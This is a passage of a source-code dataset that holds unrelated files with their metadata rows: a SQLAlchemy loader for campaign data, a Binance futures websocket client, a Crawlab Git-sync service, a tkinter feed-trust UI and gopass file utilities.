# Write to the same static config path that _getSiteConfigStatic() reads.
config_file = os.path.join(nmtk_path, 'tests/config.json')
open(config_file, 'w').write(data2)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
rtdm_analyze/db.py
|
import os
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Table, text
from sqlalchemy.orm import registry, relationship, Session
mapper_registry = registry()
Base = mapper_registry.generate_base()
SCHEMA = "RTDM_TECH"
db_url = os.getenv("RTDM_ANALYZER_DB_URL")
campaigns_blocks_data_processes_association_table = Table(
'campaigns_blocks_data_processes_association', mapper_registry.metadata,
Column('campaign_block', Integer, ForeignKey(f'{SCHEMA}.campaigns_blocks.id'), nullable=False),
Column('data_process', Integer, ForeignKey(f'{SCHEMA}.data_processes.id'), nullable=False),
schema=SCHEMA
)
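# Plain association table backing the many-to-many link between CampaignBlock and
# DataProcess; both relationship() declarations below reference it via secondary=.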
class Campaign(Base):
__tablename__ = "campaigns"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_campaign_id = Column(String, nullable=False)
campaign_name = Column(String)
campaigns_blocks = relationship("CampaignBlock", back_populates="campaign")
def __repr__(self):
return \
f"Campaign(id={self.id!r}, sas_campaign_id={self.sas_campaign_id!r}, campaign_name={self.campaign_name!r})"
class CampaignBlock(Base):
__tablename__ = "campaigns_blocks"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_block_id = Column(String, nullable=False)
block_name = Column(String)
block_type = Column(String)
subdiagram_id = Column(String)
subdiagram_name = Column(String)
campaign_id = Column(Integer, ForeignKey(f'{SCHEMA}.campaigns.id'), nullable=False)
campaign = relationship("Campaign", back_populates="campaigns_blocks")
data_processes = relationship(
"DataProcess", secondary=campaigns_blocks_data_processes_association_table, back_populates='campaigns_blocks'
)
def __repr__(self):
return f"Campaign(id={self.id!r}, sas_block_id={self.sas_block_id!r}, block_name={self.block_name!r})"
class DataProcess(Base):
__tablename__ = "data_processes"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_data_process_id = Column(String, nullable=False)
data_process_name = Column(String)
lib_name = Column(String)
table_name = Column(String)
campaigns_blocks = relationship(
"CampaignBlock", secondary=campaigns_blocks_data_processes_association_table, back_populates="data_processes"
)
def __repr__(self):
return f"Campaign(id={self.id!r}, sas_data_process_id={self.sas_data_process_id!r}, " \
f"data_process_name={self.data_process_name!r})"
class DBRunner:
def __init__(self, connection_string: str = db_url) -> None:
self.connection_string = connection_string
self.engine = create_engine(self.connection_string, future=True)
#mapper_registry.metadata.create_all(self.engine)
def clear_tables(self):
sql = """
delete from RTDM_TECH.campaigns_blocks_data_processes_association;
delete from RTDM_TECH.data_processes;
delete from RTDM_TECH.campaigns_blocks;
delete from RTDM_TECH.campaigns;
"""
session = Session(self.engine)
session.execute(text(sql))
session.commit()
session.close()
def get_all_data_processes(self):
session = Session(self.engine)
data_processes_list = [data_process.data_process_name for data_process in session.query(DataProcess).all()]
session.close()
return data_processes_list
def insert_data(self, data: dict):
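        # Insert campaigns first and flush so their generated ids can be used as
        # foreign keys for the blocks; remember each block's data process ids so
        # the many-to-many links can be wired up when data processes are inserted.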
session = Session(self.engine)
campaign_dict = {}
block_dict = {}
for row in data["campaigns"]:
row_instance = Campaign(
sas_campaign_id=row.id,
campaign_name=row.name,
)
session.add(row_instance)
session.flush()
campaign_dict[row_instance.sas_campaign_id] = row_instance.id
for row in data["blocks"]:
row_instance = CampaignBlock(
sas_block_id=row.id,
block_name=row.name,
block_type=row.type,
subdiagram_id=row.subdiagram_id,
subdiagram_name=row.subdiagram_name,
campaign_id=campaign_dict[row.campaign_id],
)
session.add(row_instance)
session.flush()
block_dict[row_instance] = row.data_process_id_list
data_process_list = []
for row in data["data_processes"]:
row_instance = DataProcess(
sas_data_process_id=row.id,
data_process_name=row.name,
lib_name=row.lib_name,
table_name=row.table_name
)
data_process_campaign_block = []
for campaign_block_instance, data_processes_id_list in block_dict.items():
if row_instance.sas_data_process_id in data_processes_id_list:
data_process_campaign_block.append(campaign_block_instance)
row_instance.campaigns_blocks = data_process_campaign_block
data_process_list.append(row_instance)
session.add_all(data_process_list)
session.commit()
session.close()
    def get_columns_of_table(self, table_name: str):
        sql = """
        select t.name table_name, c.name column_name
        from sys.tables t join sys.columns c on t.object_id = c.object_id
        where t.name = :table_name;
        """
        session = Session(self.engine)
        result = session.execute(text(sql), {"table_name": table_name})
        columns = [row[1] for row in result]
        session.close()
        return columns
    def check(self, data_process_list: list):
        table_dict = {}
        for data_process in data_process_list:
            db_column_names = self.get_columns_of_table(data_process.table_name)
            for d_p_col in data_process.columns:
                if d_p_col["name"] not in db_column_names:
                    table_dict[data_process.name] = (data_process.table_name, d_p_col)
        return table_dict
|
[] |
[] |
[
"RTDM_ANALYZER_DB_URL"
] |
[]
|
["RTDM_ANALYZER_DB_URL"]
|
python
| 1 | 0 | |
binance/FuturesWs.go
|
package binance
import (
"encoding/json"
"errors"
"net/http"
"net/url"
"os"
"sort"
"strings"
"time"
"github.com/soulsplit/goex"
"github.com/soulsplit/goex/internal/logger"
)
type FuturesWs struct {
base *BinanceFutures
f *goex.WsConn
d *goex.WsConn
depthCallFn func(depth *goex.Depth)
tickerCallFn func(ticker *goex.FutureTicker)
tradeCalFn func(trade *goex.Trade, contract string)
}
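// NewFuturesWs creates websocket clients for the USDT-margined (fstream) and
// coin-margined (dstream) futures endpoints, honoring the HTTPS_PROXY
// environment variable for both the websocket and REST connections.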
func NewFuturesWs() *FuturesWs {
futuresWs := new(FuturesWs)
wsBuilder := goex.NewWsBuilder().
ProxyUrl(os.Getenv("HTTPS_PROXY")).
ProtoHandleFunc(futuresWs.handle).AutoReconnect()
futuresWs.f = wsBuilder.WsUrl("wss://fstream.binance.com/ws").Build()
futuresWs.d = wsBuilder.WsUrl("wss://dstream.binance.com/ws").Build()
futuresWs.base = NewBinanceFutures(&goex.APIConfig{
HttpClient: &http.Client{
Transport: &http.Transport{
Proxy: func(r *http.Request) (*url.URL, error) {
return url.Parse(os.Getenv("HTTPS_PROXY"))
},
},
Timeout: 10 * time.Second,
},
})
return futuresWs
}
func (s *FuturesWs) DepthCallback(f func(depth *goex.Depth)) {
s.depthCallFn = f
}
func (s *FuturesWs) TickerCallback(f func(ticker *goex.FutureTicker)) {
s.tickerCallFn = f
}
func (s *FuturesWs) TradeCallback(f func(trade *goex.Trade, contract string)) {
s.tradeCalFn = f
}
func (s *FuturesWs) SubscribeDepth(pair goex.CurrencyPair, contractType string) error {
switch contractType {
case goex.SWAP_USDT_CONTRACT:
return s.f.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{pair.AdaptUsdToUsdt().ToLower().ToSymbol("") + "@depth10@100ms"},
Id: 1,
})
default:
sym, _ := s.base.adaptToSymbol(pair.AdaptUsdtToUsd(), contractType)
return s.d.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{strings.ToLower(sym) + "@depth10@100ms"},
Id: 2,
})
}
return errors.New("contract is error")
}
func (s *FuturesWs) SubscribeTicker(pair goex.CurrencyPair, contractType string) error {
switch contractType {
case goex.SWAP_USDT_CONTRACT:
return s.f.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{pair.AdaptUsdToUsdt().ToLower().ToSymbol("") + "@ticker"},
Id: 1,
})
default:
sym, _ := s.base.adaptToSymbol(pair.AdaptUsdtToUsd(), contractType)
return s.d.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{strings.ToLower(sym) + "@ticker"},
Id: 2,
})
}
return errors.New("contract is error")
}
func (s *FuturesWs) SubscribeTrade(pair goex.CurrencyPair, contractType string) error {
panic("implement me")
}
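// handle dispatches raw websocket payloads to the depth or ticker callback
// based on the "e" event-type field of the JSON message.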
func (s *FuturesWs) handle(data []byte) error {
var m = make(map[string]interface{}, 4)
err := json.Unmarshal(data, &m)
if err != nil {
return err
}
if e, ok := m["e"].(string); ok && e == "depthUpdate" {
dep := s.depthHandle(m["b"].([]interface{}), m["a"].([]interface{}))
dep.ContractType = m["s"].(string)
symbol, ok := m["ps"].(string)
if ok {
dep.Pair = adaptSymbolToCurrencyPair(symbol)
} else {
dep.Pair = adaptSymbolToCurrencyPair(dep.ContractType) //usdt swap
}
dep.UTime = time.Unix(0, goex.ToInt64(m["T"])*int64(time.Millisecond))
s.depthCallFn(dep)
return nil
}
if e, ok := m["e"].(string); ok && e == "24hrTicker" {
s.tickerCallFn(s.tickerHandle(m))
return nil
}
logger.Warn("unknown ws response:", string(data))
return nil
}
func (s *FuturesWs) depthHandle(bids []interface{}, asks []interface{}) *goex.Depth {
var dep goex.Depth
for _, item := range bids {
bid := item.([]interface{})
dep.BidList = append(dep.BidList,
goex.DepthRecord{
Price: goex.ToFloat64(bid[0]),
Amount: goex.ToFloat64(bid[1]),
})
}
for _, item := range asks {
ask := item.([]interface{})
dep.AskList = append(dep.AskList, goex.DepthRecord{
Price: goex.ToFloat64(ask[0]),
Amount: goex.ToFloat64(ask[1]),
})
}
sort.Sort(sort.Reverse(dep.AskList))
return &dep
}
func (s *FuturesWs) tickerHandle(m map[string]interface{}) *goex.FutureTicker {
var ticker goex.FutureTicker
ticker.Ticker = new(goex.Ticker)
symbol, ok := m["ps"].(string)
if ok {
ticker.Pair = adaptSymbolToCurrencyPair(symbol)
} else {
ticker.Pair = adaptSymbolToCurrencyPair(m["s"].(string)) //usdt swap
}
ticker.ContractType = m["s"].(string)
ticker.Date = goex.ToUint64(m["E"])
ticker.High = goex.ToFloat64(m["h"])
ticker.Low = goex.ToFloat64(m["l"])
ticker.Last = goex.ToFloat64(m["c"])
ticker.Vol = goex.ToFloat64(m["v"])
return &ticker
}
|
[
"\"HTTPS_PROXY\"",
"\"HTTPS_PROXY\""
] |
[] |
[
"HTTPS_PROXY"
] |
[]
|
["HTTPS_PROXY"]
|
go
| 1 | 0 | |
backend/services/git.go
|
package services
import (
"crawlab/lib/cron"
"crawlab/model"
"crawlab/services/spider_handler"
"crawlab/utils"
"fmt"
"github.com/apex/log"
"github.com/globalsign/mgo/bson"
"gopkg.in/src-d/go-git.v4"
"gopkg.in/src-d/go-git.v4/config"
"gopkg.in/src-d/go-git.v4/plumbing"
"gopkg.in/src-d/go-git.v4/plumbing/object"
"gopkg.in/src-d/go-git.v4/plumbing/transport/ssh"
"gopkg.in/src-d/go-git.v4/storage/memory"
"io/ioutil"
"net/url"
"os"
"path"
"regexp"
"runtime/debug"
"strings"
"time"
)
var GitCron *GitCronScheduler
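// GitCronScheduler periodically syncs the Git repositories of spiders that have auto-sync enabled.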
type GitCronScheduler struct {
cron *cron.Cron
}
type GitBranch struct {
Hash string `json:"hash"`
Name string `json:"name"`
Label string `json:"label"`
}
type GitTag struct {
Hash string `json:"hash"`
Name string `json:"name"`
Label string `json:"label"`
}
type GitCommit struct {
Hash string `json:"hash"`
TreeHash string `json:"tree_hash"`
Author string `json:"author"`
Email string `json:"email"`
Message string `json:"message"`
IsHead bool `json:"is_head"`
Ts time.Time `json:"ts"`
Branches []GitBranch `json:"branches"`
RemoteBranches []GitBranch `json:"remote_branches"`
Tags []GitTag `json:"tags"`
}
func (g *GitCronScheduler) Start() error {
	g.cron = cron.New(cron.WithSeconds())
	// start the cron service
	g.cron.Start()
	// update the task list
if err := g.Update(); err != nil {
log.Errorf("update scheduler error: %s", err.Error())
debug.PrintStack()
return err
}
	// update the task list every 30 seconds
	spec := "*/30 * * * * *"
	if _, err := g.cron.AddFunc(spec, UpdateGitCron); err != nil {
log.Errorf("add func update schedulers error: %s", err.Error())
debug.PrintStack()
return err
}
return nil
}
func (g *GitCronScheduler) RemoveAll() {
entries := g.cron.Entries()
for i := 0; i < len(entries); i++ {
g.cron.Remove(entries[i].ID)
}
}
func (g *GitCronScheduler) Update() error {
	// remove all scheduled tasks
	g.RemoveAll()
	// get the spiders with Git auto-sync enabled
spiders, err := model.GetSpiderAllList(bson.M{"git_auto_sync": true})
if err != nil {
log.Errorf("get spider list error: %s", err.Error())
debug.PrintStack()
return err
}
	// iterate over the spider list
	for _, s := range spiders {
		// add it to the scheduled jobs
if err := g.AddJob(s); err != nil {
log.Errorf("add job error: %s, job: %s, cron: %s", err.Error(), s.Name, s.GitSyncFrequency)
debug.PrintStack()
return err
}
}
return nil
}
func (g *GitCronScheduler) AddJob(s model.Spider) error {
spec := s.GitSyncFrequency
	// add the scheduled task
_, err := g.cron.AddFunc(spec, AddGitCronJob(s))
if err != nil {
log.Errorf("add func task error: %s", err.Error())
debug.PrintStack()
return err
}
return nil
}
// SaveSpiderGitSyncError saves the spider's Git sync error message
func SaveSpiderGitSyncError(s model.Spider, errMsg string) {
s, _ = model.GetSpider(s.Id)
s.GitSyncError = errMsg
if err := s.Save(); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return
}
}
// GetGitRemoteBranchesPlain lists the remote Git branch names
func GetGitRemoteBranchesPlain(gitUrl string, username string, password string) (branches []string, err error) {
storage := memory.NewStorage()
var listOptions git.ListOptions
if strings.HasPrefix(gitUrl, "http") {
gitUrl = formatGitUrl(gitUrl, username, password)
} else {
auth, err := ssh.NewPublicKeysFromFile(username, path.Join(os.Getenv("HOME"), ".ssh", "id_rsa"), "")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
listOptions = git.ListOptions{
Auth: auth,
}
}
remote := git.NewRemote(storage, &config.RemoteConfig{
URLs: []string{
gitUrl,
}})
rfs, err := remote.List(&listOptions)
if err != nil {
return
}
for _, rf := range rfs {
if rf.Type() == plumbing.SymbolicReference {
continue
}
regex := regexp.MustCompile("refs/heads/(.*)$")
res := regex.FindStringSubmatch(rf.String())
if len(res) > 1 {
branches = append(branches, res[1])
}
}
return branches, nil
}
func formatGitUrl(gitUrl, username, password string) string {
u, _ := url.Parse(gitUrl)
gitHost := u.Hostname()
gitPort := u.Port()
if gitPort == "" {
gitUrl = fmt.Sprintf(
"%s://%s:%s@%s%s",
u.Scheme,
username,
password,
u.Hostname(),
u.Path,
)
} else {
gitUrl = fmt.Sprintf(
"%s://%s:%s@%s:%s%s",
u.Scheme,
username,
password,
gitHost,
gitPort,
u.Path,
)
}
return gitUrl
}
// ResetSpiderGit resets the spider's Git repository
func ResetSpiderGit(s model.Spider) (err error) {
	// remove the directory
if err := os.RemoveAll(s.Src); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return err
}
	// create an empty directory
if err := os.MkdirAll(s.Src, os.ModePerm); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return err
}
	// sync to GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
return err
}
return nil
}
// SyncSpiderGit syncs the spider's Git repository
func SyncSpiderGit(s model.Spider) (err error) {
	// if .git does not exist, initialize a repository
if !utils.Exists(path.Join(s.Src, ".git")) {
_, err := git.PlainInit(s.Src, false)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
}
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// build the URL
var gitUrl string
if s.GitUsername != "" && s.GitPassword != "" {
gitUrl = formatGitUrl(s.GitUrl, s.GitUsername, s.GitPassword)
} else {
gitUrl = s.GitUrl
}
	// create the remote
_ = repo.DeleteRemote("origin")
_, err = repo.CreateRemote(&config.RemoteConfig{
Name: "origin",
URLs: []string{gitUrl},
})
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// build the authentication info
var auth ssh.AuthMethod
if !strings.HasPrefix(s.GitUrl, "http") {
		// SSH URL
regex := regexp.MustCompile("^(?:ssh://?)?([0-9a-zA-Z_]+)@")
res := regex.FindStringSubmatch(s.GitUrl)
username := s.GitUsername
if username == "" {
if len(res) > 1 {
username = res[1]
} else {
username = "git"
}
}
auth, err = ssh.NewPublicKeysFromFile(username, path.Join(os.Getenv("HOME"), ".ssh", "id_rsa"), "")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
}
	// fetch the repo
_ = repo.Fetch(&git.FetchOptions{
RemoteName: "origin",
Force: true,
Auth: auth,
Tags: git.AllTags,
})
	// get the worktree
wt, err := repo.Worktree()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// pull the repo
if err := wt.Pull(&git.PullOptions{
RemoteName: "origin",
Auth: auth,
ReferenceName: plumbing.HEAD,
SingleBranch: false,
}); err != nil {
if err.Error() == "already up-to-date" {
			// check whether it is a Scrapy project
sync := spider_handler.SpiderSync{Spider: s}
sync.CheckIsScrapy()
			// sync to GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
			// if there was no error, save an empty string
SaveSpiderGitSyncError(s, "")
return nil
}
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// check out the branch
if err := wt.Checkout(&git.CheckoutOptions{
Branch: plumbing.NewBranchReferenceName(s.GitBranch),
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// sync to GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// get the updated spider
s, err = model.GetSpider(s.Id)
if err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
	// check whether it is a Scrapy project
	sync := spider_handler.SpiderSync{Spider: s}
	sync.CheckIsScrapy()
	// if there was no error, save an empty string
SaveSpiderGitSyncError(s, "")
return nil
}
// AddGitCronJob returns the scheduled job that syncs the spider's Git repository
func AddGitCronJob(s model.Spider) func() {
return func() {
if err := SyncSpiderGit(s); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return
}
}
}
// UpdateGitCron updates the Git cron jobs
func UpdateGitCron() {
if err := GitCron.Update(); err != nil {
log.Errorf(err.Error())
return
}
}
// GetGitSshPublicKey returns the SSH public key
func GetGitSshPublicKey() string {
if !utils.Exists(path.Join(os.Getenv("HOME"), ".ssh")) ||
!utils.Exists(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa")) ||
!utils.Exists(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa.pub")) {
log.Errorf("no ssh public key")
debug.PrintStack()
return ""
}
content, err := ioutil.ReadFile(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa.pub"))
if err != nil {
return ""
}
return string(content)
}
// GetGitBranches gets the local Git branches
func GetGitBranches(s model.Spider) (branches []GitBranch, err error) {
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
iter, err := repo.Branches()
if iter == nil {
return branches, nil
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
branches = append(branches, GitBranch{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
return nil
}); err != nil {
return branches, err
}
return branches, nil
}
// GetGitTags gets the Git tags
func GetGitTags(s model.Spider) (tags []GitTag, err error) {
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return tags, err
}
iter, err := repo.Tags()
if iter == nil {
return tags, nil
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
tags = append(tags, GitTag{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
return nil
}); err != nil {
return tags, err
}
return tags, nil
}
// GetGitHeadHash gets the Git HEAD hash
func GetGitHeadHash(repo *git.Repository) string {
head, _ := repo.Head()
return head.Hash().String()
}
// GetGitRemoteBranches gets the remote-tracking Git branches
func GetGitRemoteBranches(s model.Spider) (branches []GitBranch, err error) {
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
iter, err := repo.References()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
if reference.Name().IsRemote() {
log.Infof(reference.Hash().String())
log.Infof(reference.Name().String())
branches = append(branches, GitBranch{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
}
return nil
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
return branches, err
}
// GetGitCommits gets the Git commits
func GetGitCommits(s model.Spider) (commits []GitCommit, err error) {
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
	// get the branch list
branches, err := GetGitBranches(s)
branchesDict := map[string][]GitBranch{}
for _, b := range branches {
branchesDict[b.Hash] = append(branchesDict[b.Hash], b)
}
	// get the remote branch list
remoteBranches, err := GetGitRemoteBranches(s)
remoteBranchesDict := map[string][]GitBranch{}
for _, b := range remoteBranches {
remoteBranchesDict[b.Hash] = append(remoteBranchesDict[b.Hash], b)
}
	// get the tag list
tags, err := GetGitTags(s)
tagsDict := map[string][]GitTag{}
for _, t := range tags {
tagsDict[t.Hash] = append(tagsDict[t.Hash], t)
}
	// get the log iterator
iter, err := repo.Log(&git.LogOptions{
All: true,
})
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
	// iterate over the log
if err := iter.ForEach(func(commit *object.Commit) error {
gc := GitCommit{
Hash: commit.Hash.String(),
TreeHash: commit.TreeHash.String(),
Message: commit.Message,
Author: commit.Author.Name,
Email: commit.Author.Email,
Ts: commit.Author.When,
IsHead: commit.Hash.String() == GetGitHeadHash(repo),
Branches: branchesDict[commit.Hash.String()],
RemoteBranches: remoteBranchesDict[commit.Hash.String()],
Tags: tagsDict[commit.Hash.String()],
}
commits = append(commits, gc)
return nil
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
return commits, nil
}
func GitCheckout(s model.Spider, hash string) (err error) {
	// open the repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
	// get the worktree
wt, err := repo.Worktree()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
	// check whether the remote origin URL matches the current GitUrl; if not, delete the local copy and re-sync from the remote
remote, err := repo.Remote("origin")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
if remote.String() != s.GitUrl {
utils.RemoveFiles(s.Src)
return SyncSpiderGit(s)
}
// Checkout
if err := wt.Checkout(&git.CheckoutOptions{
Hash: plumbing.NewHash(hash),
Create: false,
Force: true,
Keep: false,
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
return nil
}
|
[
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
21-fs-ias-lec/feedCtrl/ui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 15:15:14 2020
@author: yannickrummele
"""
import pickle
from tkinter import *
from tkinter import ttk
from .uiFunctionsHandler import *
ufh = UiFunctionHandler()
def update_feedIds():
print("update feedIDs")
feedIDsTree.delete(*feedIDsTree.get_children())
allMasterIDs = list(ufh.get_master_ids())
for i in range(len(allMasterIDs)):
treeUsername=ufh.get_username(allMasterIDs[i])
treeID=allMasterIDs[i].hex()
feedIDsTree.insert('', 'end', treeUsername, text=treeUsername, values=treeID)
feedIDsTree.item(treeUsername, tags = ('master'))
feedIDs=ufh.get_all_master_ids_feed_ids(allMasterIDs[i])
trusted = list(ufh.get_trusted())
blocked = list(ufh.get_blocked())
for feedID in feedIDs:
if feedID in trusted:
treeApplicationName = ufh.get_application(feedID)
treeApplicationID = feedID.hex()
if treeApplicationName is not None:
followedChildname = treeUsername + " followed " + treeApplicationName
feedIDsTree.insert(treeUsername, 'end', followedChildname, text=treeApplicationName,
values=treeApplicationID)
feedIDsTree.item(followedChildname, tags=('followed'))
elif feedID in blocked:
treeApplicationName = ufh.get_application(feedID)
treeApplicationID = feedID.hex()
if treeApplicationName is not None:
blockedChildname = treeUsername + " blocked " + treeApplicationName
feedIDsTree.insert(treeUsername, 'end', blockedChildname, text=treeApplicationName,
values=treeApplicationID)
feedIDsTree.item(blockedChildname, tags=('blocked'))
            else:
                treeApplicationName = ufh.get_application(feedID)
                treeApplicationID = feedID.hex()
                if treeApplicationName is not None:
                    neutralChildname = treeUsername + " " + treeApplicationName
                    feedIDsTree.insert(treeUsername, 'end', neutralChildname, text=treeApplicationName,
                                       values=treeApplicationID)
                    feedIDsTree.item(neutralChildname)
def setTrusted():
feedIDsTree.bind('<<TreeviewSelect>>', callback)
print("trusted")
curItemID = (feedIDsTree.selection()[0])
curItem="".join(feedIDsTree.item(feedIDsTree.selection()[0])['values'])
curID=bytes.fromhex(curItem)
print(curItem)
print(curID)
ufh.set_trusted(curID, True)
feedIDsTree.item(curItemID, tags=('followed'))
"""
print("I am trusting")
with open('username.pkl', 'rb') as f:
file = pickle.load(f)
f.close()
username = file.get('username')
print("ui" + username)
ufh.set_trusted_name(username)
"""
def setUntrusted():
feedIDsTree.bind('<<TreeviewSelect>>', callback)
print("untrusted")
curItemID= (feedIDsTree.selection()[0])
curItem = "".join(feedIDsTree.item(feedIDsTree.selection()[0])['values'])
curID = bytes.fromhex(curItem)
print(curItem)
print(curID)
ufh.set_trusted(curID, False)
feedIDsTree.item(curItemID, tags=('blocked'))
def callback(event):
print(feedIDsTree.selection()[0])
def updateUsername():
ufh.set_username(entryUsername.get())
print("New username: " + entryUsername.get())
#entryUsername.delete(0,END)
def updateRadius():
try:
radius=int(entryRadius.get())
ufh.set_radius(radius)
print("New radius: "+ entryRadius.get())
except Exception as e:
print("Insert a integer for the radius")
print(e)
print(entryRadius.get() + " is not a integer")
#generate_test_data()
root = Tk()
root.title("BACnet feedCtrl")
labelWelcome = Label(root, text="Welcome to BACnet feedCtrl.").grid(row=0)
labelInstruction = Label(root, text="Press the button to update the list of the FeedIDs").grid(row=1)
feedIDsTree = ttk.Treeview(root)
feedIDsTree.grid(row=4)
feedIDsTree.config(columns=('id'))
feedIDsTree.heading('#0',text='Name')
feedIDsTree.heading('id',text='ID')
feedIDsTree.tag_configure('master', background='yellow')
feedIDsTree.tag_configure('blocked', background='red')
feedIDsTree.tag_configure('followed', background='green')
feedIDsTree.config(selectmode='browse')
buttonUpdateFeedIDs =Button(root, text="UpdateFeedIDs", width=25, command=update_feedIds).grid(row=3)
buttonTrust = Button(root, text="Trust", width=25, command=setTrusted).grid(row=5)
buttonUntrust = Button(root, text="Untrust", width=25, command=setUntrusted).grid(row=6)
entryUsername = Entry(root)
entryUsername.grid(row=7)
buttonUpdateUsername = Button(root, text="Update Username", width=25, command=updateUsername).grid(row=8)
entryRadius = Entry(root)
entryRadius.grid(row=9)
buttonUpdateRadius = Button(root, text="Update Radius", width=25, command=updateRadius).grid(row=10)
buttonQuit = Button(root, text='Quit', width=25, command=root.destroy).grid(row=12)
def run():
try:
root.mainloop()
root.destroy()
root.close()
exit()
except:
pass
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
pkg/fsutil/fsutil.go
|
package fsutil
import (
"bufio"
"fmt"
"io"
"math/rand"
"os"
"os/user"
"path/filepath"
"regexp"
"strings"
"time"
"github.com/gopasspw/gopass/pkg/debug"
)
var reCleanFilename = regexp.MustCompile(`[^\w\[email protected]]`)
// CleanFilename strips all possibly suspicious characters from a filename
// WARNING: NOT suitable for pathnames as slashes will be stripped as well!
func CleanFilename(in string) string {
return strings.Trim(reCleanFilename.ReplaceAllString(in, "_"), "_ ")
}
// CleanPath resolves common aliases in a path and cleans it as much as possible
func CleanPath(path string) string {
// http://stackoverflow.com/questions/17609732/expand-tilde-to-home-directory
// TODO: We should consider if we really want to rewrite ~
if len(path) > 1 && path[:2] == "~/" {
usr, _ := user.Current()
dir := usr.HomeDir
if hd := os.Getenv("GOPASS_HOMEDIR"); hd != "" {
dir = hd
}
path = strings.Replace(path, "~/", dir+"/", 1)
}
if p, err := filepath.Abs(path); err == nil {
return p
}
return filepath.Clean(path)
}
// IsDir checks if a certain path exists and is a directory
// https://stackoverflow.com/questions/10510691/how-to-check-whether-a-file-or-directory-denoted-by-a-path-exists-in-golang
func IsDir(path string) bool {
fi, err := os.Stat(path)
if err != nil {
if os.IsNotExist(err) {
// not found
return false
}
debug.Log("failed to check dir %s: %s\n", path, err)
return false
}
return fi.IsDir()
}
// IsFile checks if a certain path is actually a file
func IsFile(path string) bool {
fi, err := os.Stat(path)
if err != nil {
if os.IsNotExist(err) {
// not found
return false
}
debug.Log("failed to check file %s: %s\n", path, err)
return false
}
return fi.Mode().IsRegular()
}
// IsEmptyDir checks if a certain path is an empty directory
func IsEmptyDir(path string) (bool, error) {
empty := true
if err := filepath.Walk(path, func(fp string, fi os.FileInfo, ferr error) error {
if ferr != nil {
return ferr
}
if fi.IsDir() && (fi.Name() == "." || fi.Name() == "..") {
return filepath.SkipDir
}
if !fi.IsDir() {
empty = false
}
return nil
}); err != nil {
return false, err
}
return empty, nil
}
// Shred overwrites the given file any number of times
func Shred(path string, runs int) error {
rand.Seed(time.Now().UnixNano())
fh, err := os.OpenFile(path, os.O_WRONLY, 0600)
if err != nil {
return fmt.Errorf("failed to open file %q: %w", path, err)
}
// ignore the error. this is only taking effect if we error out.
defer fh.Close()
fi, err := fh.Stat()
if err != nil {
return fmt.Errorf("failed to stat file %q: %w", path, err)
}
flen := fi.Size()
// overwrite using pseudo-random data n-1 times and
// use zeros in the last iteration
bufFn := func() []byte {
buf := make([]byte, 1024)
_, _ = rand.Read(buf)
return buf
}
for i := 0; i < runs; i++ {
if i >= runs-1 {
bufFn = func() []byte {
